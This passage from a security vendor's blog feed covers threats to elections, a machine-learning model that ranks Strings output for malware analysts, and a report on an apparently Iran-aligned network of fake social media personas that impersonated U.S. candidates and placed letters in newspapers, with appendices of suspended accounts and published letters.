Historically, FireEye has observed targeting of a wide range of organizations connected to elections. In considering their role and criticality to the process of elections, these various entities can be grouped into three categories: core election infrastructure, supporting organizations involved in the administration of elections, and other groups that have a participatory role in the electoral process. All of these entities may be targeted for a variety of reasons to influence or collect intelligence on the electoral process and participants.

FireEye is aware of only limited indications of entities targeted in the first category (light blue area). Although we have not observed direct evidence that actors have manipulated the electoral process in any major national or regional election by infiltrating the systems or hardware used to record or tally votes, the sheer complexity of these systems prevents us from categorically stating that these systems have not been successfully compromised.

Moving outward into the gray section of the diagram, entities that fall into this category include organizations involved in the administration of elections. While these organizations may maintain networks separate from voting systems and tabulation platforms, they play important roles in overseeing and communicating results to the public. FireEye has witnessed breaches into a variety of these organizations, in some cases for the purpose of collecting intelligence or in others to coopt and display false information on publicly-facing systems as part of an influence campaign.

Lastly, FireEye has observed targeting of organizations that are involved in election campaigns and news coverage. Tactics we have witnessed include disinformation campaigns on adversary-maintained infrastructure and social media platforms. For example, in August 2017, we observed several inauthentic news websites created to mimic legitimate local and international media organizations ahead of a sub-Saharan African nation’s presidential election. A subset of the counterfeit domains appears to have been created in coordination with each other, if not by the same actor, to damage the reputation of the presidential nominee for the opposition party.

The Threat Activity

To counter and mitigate risks to elections, properly categorizing the specific activity and intent is important. While terms like “election interference” are often used to describe all of the threats in this space, some of the malicious activity FireEye has witnessed may fall outside this definition. Broadly speaking most election-related threats can be thought of in four categories: social-media enabled disinformation, cyber espionage, “hack and leak” campaigns, and attacks on critical election infrastructure.

  • Social-Media Enabled Disinformation: This category includes the activity FireEye has tracked from the Russia-affiliated Internet Research Association (IRA) and various Iranian disinformation operations. In some cases, this has involved creating fraudulent content on controversial issues and seeking to promote it across social media platforms. In other examples, disinformation campaigns have focused on amplifying already issues that have organic interest. Some of these campaigns may also be involved in politically-motivated messaging on social media platforms prior to elections without a specific focus electoral events.
  • Cyber Espionage: Nation state actors like Russia-nexus APT28 and Sandworm Team, and China-nexus APT40, have carried out cyber espionage operations against multiple types of targets in the election ecosystem. This has ranged from intrusions into everything from political campaigns to election commissions, likely for a variety of reasons. In some cases, these actors are possibly seeking to obtain information on policy stances of candidates and political parties. In other situations—particularly against election administrators or system vendors—it is possible that these intrusions are reconnaissance for further operations, seeking to understand network layouts that may allow them to move into more critical infrastructure.   
  • “Hack and Leak” Campaigns: Some threat actors that FireEye has observed have utilized the data they’ve gained from espionage intrusions to then leak that information with the intent of influencing public perception. In this manner, they combine the previous two categories of activity. Notably, this tactic has been employed by Guccifer 2.0 and DC Leaks in the 2016 U.S. election. In some cases, similar tactics have leveraged compromised infrastructure to carry out disinformation operations, such as in the 2014 Ukrainian presidential campaign in which Russian-nexus actors posted erroneous election results from the compromised Ukrainian election commission website.
  • Attacks on Critical Election Infrastructure : Compromises into core critical infrastructure such as election management systems, voting systems, electronic pollbooks, and others represent the most critical risks to elections, with the potential to alter or delete votes or voters from voter rolls. Though this is an often-discussed risk, there is limited evidence of intrusion activity targeting core election infrastructure.

Of the activity described here, FireEye has observed a full spectrum of campaigns by Russian-nexus actors, from carrying out intrusions into organizations and stealing data, leaking that data through online personas and fronts, as well as targeting of election infrastructure. From limited observations, China has for the most part focused solely on cyber espionage operations, as in the case of activity FireEye reported on in the targeting the 2018 Cambodian election. From various motivations, FireEye has also witnessed limited evidence of activity from hacktivists and criminal entities in targeting parts of the election ecosystem.

Conclusion

While there is increasing global awareness of threats to elections, election administrators and others continue to face challenges in ensuring the integrity of the vote. To properly counter threats to elections, individuals and organizations involved in the electoral process should:

  • Learn the Playbook of the Adversary: Proactive organizations can learn from the activity of threat actors uncovered in other elections and implement security controls that adapt to new tools and TTPs. Political campaigns and others should also educate staff and contractors on common spear-phishing tactics used by some of the primary APT groups.
  • Incorporate Threat Intelligence for Context: Operationally, security organizations can utilize threat intelligence to better differentiate and triage the most important alerts from untargeted commodity malware activity.
  • Anticipate External Threats: Beyond the internal networks of county governments and political campaigns, election administrators and risk management professionals involved in elections should prepare plans for dealing with leaked and compromised data, understanding how threat actors may utilize this for disinformation campaigns.

I will be speaking about cyber threats and elections during FireEye Virtual Summit, so register today to learn more.

Learning to Rank Strings Output for Speedier Malware Analysis

29 May 2019 at 14:30

Reverse engineers, forensic investigators, and incident responders have an arsenal of tools at their disposal to dissect malicious software binaries. When performing malware analysis, they successively apply these tools in order to gradually gather clues about a binary’s function, design detection methods, and ascertain how to contain its damage. One of the most useful initial steps is to inspect its printable characters via the Strings program. A binary will often contain strings if it performs operations like printing an error message, connecting to a URL, creating a registry key, or copying a file to a specific location – each of which provide crucial hints that can help drive future analysis.

Manually filtering out these relevant strings can be time consuming and error prone, especially considering that:

  • Relevant strings occur disproportionately less often than irrelevant strings.
  • Larger binaries can output upwards of tens of thousands of individual strings.
  • The definition of "relevant” can vary significantly across individual human analysts.

Investigators would never want to miss an important clue that could have reduced their time spent performing the malware analysis, or even worse, led them to draw incomplete or incorrect conclusions. In this blog post, we will demonstrate how the FireEye Data Science (FDS) and FireEye Labs Reverse Engineering (FLARE) teams recently collaborated to streamline this analyst pain point using machine learning.

Highlights

  • Running the Strings program on a piece of malware inevitably produces noisy strings mixed in with important ones, which can only be uncovered after sifting and scrolling through the entirety of its messy output. FireEye’s new machine learning model that automatically ranks strings based on their relevance for malware analysis speeds up this process at scale.
  • Knowing which individual strings are relevant often requires highly experienced analysts. Quality, security-relevant labeled training data can be time consuming and expensive to obtain, but weak supervision that leverages the domain expertise of reverse engineers helps accelerate this bottleneck.
  • Our proposed learning-to-rank model can efficiently prioritize Strings outputs from individual malware samples. On a dataset of relevant strings from over 7 years of malware reports authored by FireEye reverse engineers, it also performs well based on criteria commonly used to evaluate recommendation and search engines.

Background

Each string returned by the Strings program is represented by sequences of 3 characters or more ending with a null terminator, independent of any surrounding context and file formatting. These loose criteria mean that Strings may identify sequences of characters as strings when they are not human-interpretable. For example, if consecutive bytes 0x31, 0x33, 0x33, 0x37, 0x00 appear within a binary, Strings will interpret this as “1337.” However, those ASCII characters may not actually represent that string per se; they could instead represent a memory address, CPU instructions, or even data utilized by the program. Strings leaves it up to the analyst to filter out such irrelevant strings that appear within its output. For instance, only a handful of the strings listed in Figure 1 that originate from an example malicious binary are relevant from a malware analyst’s point of view.


Figure 1: An example Strings output containing 44 strings for a toy sample with a SHA-256 value of eb84360ca4e33b8bb60df47ab5ce962501ef3420bc7aab90655fd507d2ffcedd.

Ranking strings in terms of descending relevance would make an analyst’s life much easier. They would then only need to focus their attention on the most relevant strings located towards the top of the list, and simply disregard everything below. However, solving the task of automatically ranking strings is not trivial. The space of relevant strings is unstructured and vast, and devising finely tuned rules to robustly account for all the possible variations among them would be a tall order.

Learning to Rank Strings Output

This task can instead be formulated in a machine learning (ML) framework called learning to rank (LTR), which has been historically applied to problems like information retrieval, machine translation, web search, and collaborative filtering. One way to tackle LTR problems is by using Gradient Boosted Decision Trees (GBDTs). GBDTs successively learn individual decision trees that reduce the loss using a gradient descent procedure, and ultimately use a weighted sum of every trees’ prediction as an ensemble. GBDTs with an LTR objective function can learn class probabilities to compute each string’s expected relevance, which can then be used to rank a given Strings output. We provide a high-level overview of how this works in Figure 2.

In the initial train() step of Figure 2, over 25 thousand binaries are run through the Strings program to generate training data consisting of over 18 million total strings. Each training sample then corresponds to the concatenated list of ASCII and Unicode strings output by the Strings program on that input file. To train the model, these raw strings are transformed into numerical vectors containing natural language processing features like Shannon entropy and character co-occurrence frequencies, together with domain-specific signals like the presence of indicators of compromise (e.g. file paths, IP addresses, URLs, etc.), format strings, imports, and other relevant landmarks.


Figure 2: The ML-based LTR framework ranks strings based on their relevance for malware analysis. This figure illustrates different steps of the machine learning modeling process: the initial train() step is denoted by solid arrows and boxes, and the subsequent predict() and sort() steps are denoted by dotted arrows and boxes.

Each transformed string’s feature vector is associated with a non-negative integer label that represents their relevance for malware analysis. Labels range from 0 to 7, with higher numbers indicating increased relevance. To generate these labels, we leverage the subject matter knowledge of FLARE analysts to apply heuristics and impose high-level constraints on the resulting label distributions. While this weak supervision approach may generate noise and spurious errors compared to an ideal case where every string is manually labeled, it also provides an inexpensive and model-agnostic way to integrate domain expertise directly into our GBDT model.

Next during the predict() step of Figure 2, we use the trained GBDT model to predict ranks for the strings belonging to an input file that was not originally part of the training data, and in this example query we use the Strings output shown in Figure 1. The model predicts ranks for each string in the query as floating-point numbers that represent expected relevance scores, and in the final sort() step of Figure 2, strings are sorted in descending order by these scores. Figure 3 illustrates how this resulting prediction achieves the desired goal of ranking strings according to their relevance for malware analysis.


Figure 3: The resulting ranking on the strings depicted in both Figure 1 and in the truncated query of Figure 2. Contrast the relative ordering of the strings shown here to those otherwise identical lists.

The predicted and sorted string rankings in Figure 3 show network-based indicators on top of the list, followed by registry paths and entries. These reveal the potential C2 server and malicious behavior on the host. The subsequent output consisting of user-related information is more likely to be benign, but still worthy of investigation. Rounding out the list are common strings like Windows API functions and PE artifacts that tend to raise no red flags for the malware analyst.

Quantitative Evaluation

While it seems like the model qualitatively ranks the above strings as expected, we would like some quantitative way to assess the model’s performance more holistically. What evaluation criteria can we use to convince ourselves that the model generalizes beyond the coverage of our weak supervision sources, and to compare models that are trained with different parameters?

We turn to the recommender systems literature, which uses the Normalized Discounted Cumulative Gain (NDCG) score to evaluate ranking of items (i.e. individual strings) in a collection (i.e. a Strings output). NDCG sounds complicated, but let’s boil it down one letter at a time:

  • “G” is for gain, which corresponds to the magnitude of each string’s relevance.
  • “C” is for cumulative, which refers to the cumulative gain or summed total of every string’s relevance.
  • “D” is for discounted, which divides each string’s predicted relevance by a monotonically increasing function like the logarithm of its ranked position, reflecting the goal of having the most relevant strings ranked towards the top of our predictions.
  • “N” is for normalized, which means dividing DCG scores by ideal DCG scores calculated for a ground truth holdout dataset, which we obtain from FLARE-identified relevant strings contained within historical malware reports. Normalization makes it possible to compare scores across samples since the number of strings within different Strings outputs can vary widely.


Figure 4: Kernel Density Estimate of NDCG@100 scores for Strings outputs from the holdout dataset. Scores are calculated for the original ordering after simply running the Strings program on each binary (gray) versus the predicted ordering from the trained GBDT model (red).

In practice, we take the first k strings indexed by their ranks within a single Strings output, where the k parameter is chosen based on how many strings a malware analyst will attend to or deem relevant on average. For our purposes we set k = 100 based on the approximate average number of relevant strings per Strings output. NDCG@k scores are bounded between 0 and 1, with scores closer to 1 indicating better prediction quality in which more relevant strings surface towards the top. This measurement allows us to evaluate the predictions from a given model versus those generated by other models and ranked with different algorithms.

To quantitatively assess model performance, we run the strings from each sample that have ground truth FLARE reports though the predict() step of Figure 2, and compare their predicted ranks with a baseline of the original ranking of strings output by Strings. The divergence in distributions of NDCG@100 scores between these two approaches demonstrates that the trained GBDT model learns a useful structure that generalizes well to the independent holdout set (Figure 4).

Conclusion

In this blog post, we introduced an ML model that learns to rank strings based on their relevance for malware analysis. Our results illustrate that it can rank Strings output based both on qualitative inspection (Figure 3) and quantitative evaluation of NDCG@k (Figure 4). Since Strings is so commonly applied during malware analysis at FireEye and elsewhere, this model could significantly reduce the overall time required to investigate suspected malicious binaries at scale. We plan on continuing to improve its NDCG@k scores by training it with more high fidelity labeled data, incorporating more sophisticated modeling and featurization techniques, and soliciting further analyst feedback from field testing.

It’s well known that malware authors go through great lengths to conceal useful strings from analysts, and a potential blind spot to consider for this model is that the utility of Strings itself can be thwarted by obfuscation. However, open source tools like the FireEye Labs Obfuscated Strings Solver (FLOSS) can be used as an in-line replacement for Strings. FLOSS automatically extracts printable strings just as Strings does, but additionally reveals obfuscated strings that have been encoded, packed, or manually constructed on the stack. The model can be readily trained on FLOSS outputs to rank even obfuscated strings. Furthermore, since it can be applied to arbitrary lists of strings, the model could also be used to rank strings extracted from live memory dumps and sandbox runs.

This work represents a collaboration between the FDS and FLARE teams, which together build predictive models to help find evil and improve outcomes for FireEye’s customers and products. If you are interested in this mission, please consider joining the team by applying to one of our job openings.

Network of Social Media Accounts Impersonates U.S. Political Candidates, Leverages U.S. and Israeli Media in Support of Iranian Interests

28 May 2019 at 19:00

In August 2018, FireEye Threat Intelligence released a report exposing what we assessed to be an Iranian influence operation leveraging networks of inauthentic news sites and social media accounts aimed at audiences around the world. We identified inauthentic social media accounts posing as everyday Americans that were used to promote content from inauthentic news sites such as Liberty Front Press (LFP), US Journal, and Real Progressive Front. We also noted a then-recent shift in branding for some accounts that had previously self-affiliated with LFP; in July 2018, the accounts dropped their LFP branding and adopted personas aligned with progressive political movements in the U.S. Since then, we have continued to investigate and report on the operation to our intelligence customers, detailing the activity of dozens of additional sites and hundreds of additional social media accounts.

Recently, we investigated a network of English-language social media accounts that engaged in inauthentic behavior and misrepresentation and that we assess with low confidence was organized in support of Iranian political interests. In addition to utilizing fake American personas that espoused both progressive and conservative political stances, some accounts impersonated real American individuals, including a handful of Republican political candidates that ran for House of Representatives seats in 2018. Personas in this network have also had material published in U.S. and Israeli media outlets, attempted to lobby journalists to cover specific topics, and appear to have orchestrated audio and video interviews with U.S. and UK-based individuals on political issues. While we have not at this time tied these accounts to the broader influence operation we identified last year, they promoted material in line with Iranian political interests in a manner similar to accounts that we have previously assessed to be of Iranian origin. Most of the accounts in the network appear to have been suspended on or around the evening of 9 May, 2019. Appendix 1 provides a sample of accounts in the network.

The Network

The accounts, most of which were created between April 2018 and March 2019, used profile pictures appropriated from various online sources, including, but not limited to, photographs of individuals on social media with the same first names as the personas. As with some of the accounts that we identified to be of Iranian origin last August, some of these new accounts self-described as activists, correspondents, or “free journalist[s]” in their user descriptions. Some accounts posing as journalists claimed to belong to specific news organizations, although we have been unable to identify individuals belonging to those news organizations with those names.

Narratives promoted by these and other accounts in the network included anti-Saudi, anti-Israeli, and pro-Palestinian themes. Accounts expressed support for the Joint Comprehensive Plan of Action (JCPOA), commonly known as the Iran nuclear deal; opposition to the Trump administration’s designation of Iran’s Islamic Revolutionary Guard Corps (IRGC) as a Foreign Terrorist Organization; antipathy toward the Ministerial to Promote a Future of Peace and Security in the Middle East (a U.S.-led conference that focused on Iranian influence in the Middle East more commonly known as the February 2019 Warsaw Summit); and condemnation of U.S. President Trump’s veto of a resolution passed by Congress to end U.S. involvement in the Yemen conflict.


Figure 1: Sample tweets on the Trump administration’s designation of Iran’s IRGC as a Foreign Terrorist Organization

Interestingly, some accounts in the network also posted a small amount of messaging seemingly contradictory to their otherwise pro-Iran stances. For example, while one account’s tweets were almost entirely in line with Iranian political interests, including a tweet claiming that “iran has shown us that his nuclear program is peaceful [sic],” the account also posted a series of tweets directed at U.S. President Trump on Sept. 25, 2018, the same day that he gave a speech to the United Nations in which he excoriated the Iranian Government. The account called on Trump to attack Iran, using the hashtags #attack_Iran, #go_to_hell_Rouhani, #stop_sanctions, #UnitedNations, and #trump_speech; other accounts in the network, which likewise predominantly held pro-Iran stances, echoed these sentiments, using the same or similar hashtags. It is possible that these accounts were seeking to build an audience with views antipathetic to Iran that could then later be targeted with pro-Iranian messaging.

Apart from the narratives and messaging promoted, we observed several limited indicators that the network was operated by Iranian actors. For example, one account in the network, @AlexRyanNY, created in 2010, had only two visible tweets prior to 2017, one of which, from 2011, was in Persian and of a personal nature. Subsequently in 2017, @AlexRyanNY claimed in a tweet to be “an Iranian who supported Hillary” in a tweet directed at a Democratic political strategist. This account, using the display name “Alex Ryan” and claiming to be a Newsday correspondent, appropriated the photograph of a genuine individual also with the first name of Alex. We note that it is possible that the account was compromised from another individual or that it was merely repurposed by the same actor. Additionally, while most of the accounts in the network had their interface languages set to English, we observed that one account had its interface language set to Persian.

Impersonation of U.S. Political Candidates

Some Twitter accounts in the network impersonated Republican political candidates that ran for House of Representatives seats in the 2018 U.S. congressional midterms. These accounts appropriated the candidates’ photographs and, in some cases, plagiarized tweets from the real individuals’ accounts. Aside from impersonating real U.S. political candidates, the behavior and activity of these accounts resembled that of the others in the network.

For example, the account @livengood_marla impersonated Marla Livengood, a 2018 candidate for California’s 9th Congressional District, using a photograph of Livengood and a campaign banner for its profile and background pictures. The account began tweeting on Sept. 24, 2018, with its first tweet plagiarizing one from Livengood’s official account earlier that month:


Figure 2: Tweet by suspect account @livengood_marla, dated Sept. 24, 2018 (left); tweet by Livengood’s verified account, dated Sept. 1, 2018 (right)

The @livengood_marla account plagiarized a number of other tweets from Livengood’s official account, including some that referenced Livengood’s official account username:


Figure 3: Tweet by suspect account @livengood_marla, dated Sept. 24, 2018 (left); tweet by Livengood’s verified account, dated Sept. 3, 2018 (right)

The @livengood_marla account also tweeted various news snippets on both political and apolitical subjects, such as the confirmation of Brett Kavanaugh to the U.S. Supreme Court and the wedding of the UK’s Princess Eugenie and Jack Brooksbank, prior to segueing into promoting material more closely aligned with Iranian interests. For example, the account, along with others in the network, commemorated the United Nations’ International Day of the Girl Child with a photograph of emaciated children in Yemen, as well as narratives pertaining to the killing of Saudi journalist Jamal Khashoggi and Saudi Shiite child Zakaria al-Jaber, intended to portray Saudi Arabia in a negative light.

In another example, the account @ButlerJineea impersonated Jineea Butler, a 2018 candidate for New York’s 13th Congressional District, using a photograph of Butler for its profile picture and incorporating her campaign slogans into its background picture, as well as claiming in its Twitter bio to be a “US House candidate, NY-13” and linking to Butler’s website, jineeabutlerforcongress.com.


Figure 4: Suspect account @ButlerJineea (left); apparent legitimate, currently inactive account @Jineea4congress (right)

These and other accounts in the network plagiarized tweets from additional sources beyond the individuals they impersonated, including other U.S. politicians, about both political and apolitical topics.

Influence Activity Leveraged U.S. and Israeli Media

In addition to directly posting material on social media, we observed some personas in the network leverage legitimate print and online media outlets in the U.S. and Israel to promote Iranian interests via the submission of letters, guest columns, and blog posts that were then published. We also identified personas that we suspect were fabricated for the sole purpose of submitting such letters, but that do not appear to maintain accounts on social media. The personas claimed to be based in varying locations depending on the news outlets they were targeting for submission; for example, a persona that listed their location as Seattle, WA in a letter submitted to the Seattle Times subsequently claimed to be located in Baytown, TX in a letter submitted to The Baytown Sun. Other accounts in the network then posted links to some of these letters on social media.

The letters and columns, many of which were published in 2018 and 2019, but which date as far back as 2015, were mostly published in small, local U.S. news outlets; however, several larger outlets have also published material that we suspect was submitted by these personas (see Appendix 2). In at least two cases, the text of letters purportedly authored by different personas and published in different newspapers was identical or nearly identical, while in other instances, separate personas promoted the same narratives in letters published within several days of each other. The published material was not limited to letters; one persona, “John Turner,” maintained a blog on The Times of Israel website from January 2017 to November 2018, and wrote articles for the U.S.-based site Natural News Blogs from August 2015 to July 2018. The letters and articles primarily addressed themes or promoted stances in line with Iranian political interests, similar to the activity conducted on social media.


Figure 5: Sample letter published in Galveston County’s (Texas) The Daily News, authored by suspect persona Mathew O’Brien

We have thus far identified at least five suspicious personas that have had letters or other content published by legitimate news outlets. We surmise that additional personas exist, based on other investigatory leads.

“John Turner”: The John Turner persona has been active since at least 2015. Turner has claimed to be based, variously, in New York, NY, Seattle, WA, and Washington, DC. Turner described himself as a journalist in his Twitter profile, though has also claimed both to work at the Seattle Times and to be a student at Villanova University, claiming to be attending between 2015 and 2020. In addition to letters published in various news outlets, John Turner maintained a blog on The Times of Israel site in 2017 and 2018 and has written articles for Natural News Blogs. At least one of Turner’s letters was promoted in a tweet by another account in the network.

“Ed Sullivan”: The Ed Sullivan persona, which has on at least one occasion used the same headshot as that of John Turner, has had letters published in the Galveston County, Texas-based The Daily News, the New York Daily News, and the Los Angeles Times, including some letters identical in text to those authored by the “Jeremy Watte” persona (see below) published in the Texas-based outlet The Baytown Sun. Ed Sullivan has claimed his location to be, variously, Galveston and Newport News (Virginia).

“Mathew Obrien”: The Mathew Obrien persona, whose name has also been spelled “Matthew Obrien” and “Mathew O’Brien”, claimed in his Twitter bio to be a Newsday correspondent. The persona has had letters published in Galveston County’s The Daily News and the Athens, Texas-based Athens Daily Review; in those letters, his claimed locations were Galveston and Athens, respectively, while the persona’s Twitter account, @MathewObrien1, listed a location of New York, NY. At least one of Obrien’s letters was promoted in a tweet by another account in the network.

“Jeremy Watte”: Letters signed by the Jeremy Watte persona have been published in The Baytown Sun and the Seattle Times, where he claimed to be based in Baytown and Seattle, respectively. The texts of at least two letters signed by Jeremy Watte are identical to that in letters published in other newspapers under the name Ed Sullivan. At least one of his letters was promoted in a tweet by another account in the network.

“Isabelle Kingsly”: The Isabelle Kingsly persona claimed on her Twitter profile (@IsabelleKingsly) to be an “Iranian-American” based in Seattle, WA. Letters signed by Kingsly have appeared in The Baytown Sun and the Newport News Virginia local paper The Daily Press; in those letters, Kingsly’s location is listed as Galveston and Newport News, respectively. The @IsabelleKingsly Twitter account’s profile picture and other posted pictures were appropriated from a social media account of what appears to be a real individual with the same first name of Isabelle. At least one of Kingsly’s letters was promoted in a tweet by another account in the network.

Other Media Activity

Personas in the network also engaged in other media-related activity, including criticism and solicitation of mainstream media coverage, and conducting remote video and audio interviews with real U.S. and UK-based individuals while presenting themselves as journalists. One of those latter personas presented as working for a mainstream news outlet.

Criticism/Solicitation of Media Coverage

Accounts in the network directed tweets at mainstream media outlets, calling on them to provide coverage of topics aligned with Iranian interests or, alternatively, criticizing them for insufficient coverage of those topics. For example, we observed accounts criticizing media outlets over their lack of coverage of the killing of Shiite child Zakaria al-Jaber in Saudi Arabia, as well as Saudi Arabia’s conduct in the Yemen conflict. While such activity might have been intended to directly influence the media outlets’ reporting, the accounts may have also been aiming to reach a wider audience by tweeting at outlets with a large following that woud see those replies.


Figure 6: Sample tweets by suspect accounts calling on mainstream media outlets to increase their coverage of alleged Saudi activity in the Yemen conflict

“Media” Interviews with Real U.S., UK-Based Individuals

Accounts in the network, under the guise of journalist personas, also solicited various individuals over Twitter for interviews and chats, including real journalists and politicians. The personas appear to have successfully conducted remote video and audio interviews with U.S. and UK-based individuals, including a prominent activist, a radio talk show host, and a former U.S. Government official, and subsequently posted the interviews on social media, showing only the individual being interviewed and not the interviewer. The interviewees expressed views that Iran would likely find favorable, discussing topics such as the February 2019 Warsaw summit, an attack on a military parade in the Iranian city of Ahvaz, and the killing of Jamal Khashoggi.

The provenance of these interviews appear to have been misrepresented on at least one occasion, with one persona appearing to have falsely claimed to be operating on behalf of a mainstream news outlet; a remote video interview with a US-based activist about the Jamal Khashoggi killing was posted by an account adopting the persona of a journalist from the outlet Newsday, with the Newsday logo also appearing in the video. We did not identify any Newsday interview with the activist in question on this topic. In another instance, a persona posing as a journalist directed tweets containing audio of an interview conducted with a former U.S. Government official at real media personalities, calling on them to post about the interview.

Conclusion

We are continuing to investigate this and potentially related activity that may be being conducted by actors in support of Iranian interests. At this time, we are unable to provide further attribution for this activity, and we note the possibility that the activity could have been designed for alternative purposes or include some small percentage of authentic behavior. However, if it is of Iranian origin or supported by Iranian state actors, it would demonstrate that Iranian influence tactics extend well beyond the use of inauthentic news sites and fake social media personas, to also include the impersonation of real individuals on social media and the leveraging of legitimate Western news outlets to disseminate favorable messaging. If this activity is being conducted by the same or related actors as those responsible for the Liberty Front Press network of inauthentic news sites and affiliated social media accounts that we exposed in August 2018, it may also suggest that these actors remain undeterred by public exposure or by social media platforms’ shutdowns of their accounts, and that they continue to seek to influence audiences within the U.S. toward positions in line with Iranian political interests.

Appendices

Appendix 1: Sample Twitter accounts identified in this network, currently suspended.

Username

Display Name

Bio

Creation Date

Location

@MichaelA22444

Michael Anderson

Free journalist #resist

3/16/2019

DC

@sammichelsn1995

Sam Michelson

Journalist.

In search of reality.

1995.

Resistance.

3/14/2019

 

@JasonCa26738291

Jason Campbell

It’s our duty to leave our Country-to our children-better than we found it

2/20/2019

 

@SaraMar44752473

Sara Martin

 

1/24/2019

 

@LisaBro09759828

Lisa Brown

 

1/24/2019

 

@Jennife67352965

Jennifer Parker

I AM

1/23/2019

 

@SusanSc25255529

Susan Scott

Don't think too hard, just have fun with life...

1/22/2019

 

@LindaJa02370118

Linda Jackson

I drink lots of tea...

1/22/2019

 

@MarkAda05568324

Mark Adams

 

1/22/2019

 

@aliisseeeee

alliisse

Liberty

1/21/2019

New York

@morsi18

morsi

 

1/13/2019

 

@AntiReality2

Anti_Reality

Very angry

mad at politicians

In favor of sick minds

1/9/2019

North Carolina, USA

@JennyMick3

Jenny Mick

Unemployment

Widow

mother of two

1/9/2019

Pennsylvania, USA

@JaneAnton9

Jane Anton

Daughter of best parent.

 

Do your best, just let your success shows your efforts.

1/9/2019

California, USA

@RabinAntonio

Antonio Rabin

Student at Harvard college.

somehow into politics.

I love gym

1/9/2019

 

@Angelofhuman1

Angel of human

I do into beauty and humanity

12/26/2018

California, USA

@AliciaHernan3

Alicia Hernan

Wife, mom of tow sons, student,

in favor of peace.

12/26/2018

New York, USA

@ThomasRace3

Thomas Race

Bodybuilding

sports and into Music and gym

12/25/2018

Michigan, USA

@EmmaWil14155495

Emma Wilkerson

Student in college  studying International law

12/25/2018

Sunnyvale, CA

@Kevin24798000

Kevin

A free person from everywhere

I'm somehow into politics

12/15/2018

New York, USA

@ImanRashedii

Iman Rashed

Correspondent at  https://t.co/3hxSgtkuXh.  🎥📸Freelance Journalist.    ➡️➡️oppose War and Brutality 💆‍♂️I was born in Beirut

12/8/2018

London

@emAnderson1996

emily anderson

In search of peace.

Really into politics and justice.

Love US and other countries.

10/6/2018

New York, USA

@FordNaava

naava ford

 

10/2/2018

 

@MaazRoss

maaz ross

follow back

9/30/2018

 

@sam86523055

ResistSam

high educated free journalist in favor of politics

in search of reality

Middle East issues

9/29/2018

New York, USA

@ButlerJineea

Jineea Butler

US House candidate, NY-13

9/26/2018

U.S. Congressional Candidate for NY District 13 serving Harlem, Washington Heights and Western Bronx.US

@TynioAnya

Anya Tynio

 

9/26/2018

 

@livengood_marla

Marla Livengood

 

9/23/2018

 

@Fall_Of_Amercia

Fall_of_Amercia

save the US

9/8/2018

Washington, DC

@IsabelleKingsly

Elizabeth Warren not for 2020

Single. Iranian-American. Lifestyle.And a tad of politics. @ewarren not for 2020.

9/8/2018

Seattle, WA

@MathewObrien1

Mathew Obrien

A single boy,@Newsday correspondent , interested in news Scientist🔬. Animal 🐘 and Nature lover🌲, hiker and backpacker♍   .

6/21/2018

New York, NY

@HumanBeingUSA

Human-Rights

The fight for human rights never sleeps, standing up for human rights across the world, wherever justice, freedom, fairness and truth are denied.

6/14/2018

New York, USA

@ashleyc57528342

ashley cohen

follow me to get follow back

6/14/2018

Arizona, USA

@josefsanchezzzz

josef sanchez

 

6/10/2018

 

@GuillouJan

jan guillou

 

5/13/2018

 

@saidqutb2

saidqutb

 

5/12/2018

 

@olegkashin4321

rajat sharma

 

5/8/2018

 

@Suzan_Nicolson

Suzan Nicholson

follow me to get follow back

5/8/2018

Las Vegas, NV

@caroloffoff

diana culi

 

5/7/2018

 

@hairullomirsaid

guillem balague

 

5/7/2018

 

@habibayyoub1

habib ayyoub

 

5/6/2018

 

@daphneposh

James Anderson

No Magats 🚫, 🔥 Anti War & Hate, Pro Equality, Humanity, Humor & Sensible Gun Reform

4/30/2018

New York, USA

@JohnHoward333

John H.T

Journalist. RTs Are not necessarily endorsements. All views my own. #Resist

5/12/2015

Washington, USA

@AlexRyanNY

Alex Ryan

New Yorker, @Newsday correspondent.

You don't have a soul. You are a Soul. You have a body.

4/17/2011

New York, USA

Table 1: Sample Twitter accounts identified in this network

Appendix 2: Sample letters published in news outlets submitted by personas identified in this network, August 2018 to April 2019.

Date

Author

Author’s Listed Location

Newspaper

Article

Aug. 1, 2018

Jeremy Watte

Baytown

The Baytown Sun (baytownsun.com)

Title: “Trump’s wall just a vanity project”

The letter argues against the Trump administration’s proposed border wall with Mexico. The text of the letter is identical to that published in Galveston County’s The Daily News (galvnews.com) on Aug. 4, 2018, three days later.

http://baytownsun.com/opinion/article_85fa9df4-9527-11e8-9aa8-1bb745e7141a.html

Aug. 4, 2018

Ed Sullivan

Galveston

Galveston County’s The Daily News (galvnews.com)

Title: “Trump cares not one wit about effects of shutdown”

The text of the letter is identical to that published in The Baytown Sun on Aug. 1.

https://www.galvnews.com/opinion/guest_columns/article_7d5b3e9b-cbdd-5ac8-8c91-3a1eb0da3df7.html

Oct. 11, 2018

Jeremy Watte

Baytown

The Baytown Sun (baytownsun.com)

Title: “Time to fight for it”

The letter, written from the point of view of an individual aligned with the U.S. political left, calls on individuals to fight for justice.

http://baytownsun.com/opinion/article_915fde6c-ccf3-11e8-a085-33dce44563d1.html

Oct. 23, 2018

Ed Sullivan

Newport News

New York Daily News (nydailynews.com)

Title: “Don’t shrug off Khashoggi’s murder”

The letter argues that “the most fitting and best memorial to Jamal Khashoggi,” a Saudi journalist who was murdered in the Saudi embassy in Istanbul, “would be the swift end to the war in Yemen.”

https://www.nydailynews.com/dp-edt-letswed-1024-story.html

Oct. 23, 2018

Ed Sullivan

Newport News

Los Angeles Times (latimes.com)

Title: “Don’t shrug off Khashoggi’s murder”

The letter is identical to that published in the New York Daily News on the same day.

https://www.latimes.com/dp-edt-letswed-1024-story.html

Nov. 27, 2018

John Turner

New York, NY

Times of Israel (blog.timesofisrael.com)

Title: “Saudi Arabia’s foreign policy is failing”

The letter states that the murder of Jamal Khashoggi is “the latest in a series of foreign policy blunders” committed by the Saudi Crown Prince Mohammed Bin Salman.

https://blogs.timesofisrael.com/saudi-arabias-foreign-policy-is-failing/

Nov. 30, 2018

John Turner

New York, NY

Times of Israel (blog.timesofisrael.com)

Title: “Relations with Israel will not benefit Gulf states”

The letter argues that the Gulf states will not benefit from normalized relations with Israel, stating that “the Arab street” would not support those relations and that such a move would be risky for “the Gulf’s unelected rulers.”

https://blogs.timesofisrael.com/relations-with-israel-will-not-benefit-gulf-states/

Dec. 26, 2018

Isabelle Kingsly

Galveston

The Baytown Sun (baytownsun.com)

Title: “Wild West sheriff”

The letter argues that Trump is not an aberration in U.S. history, but rather an ideological descendant of various U.S. historical currents; the article also calls him “an authoritarian, racist madman.”

http://baytownsun.com/opinion/letters/article_4ad26b8c-08bb-11e9-9056-3f5207ea4cf7.html

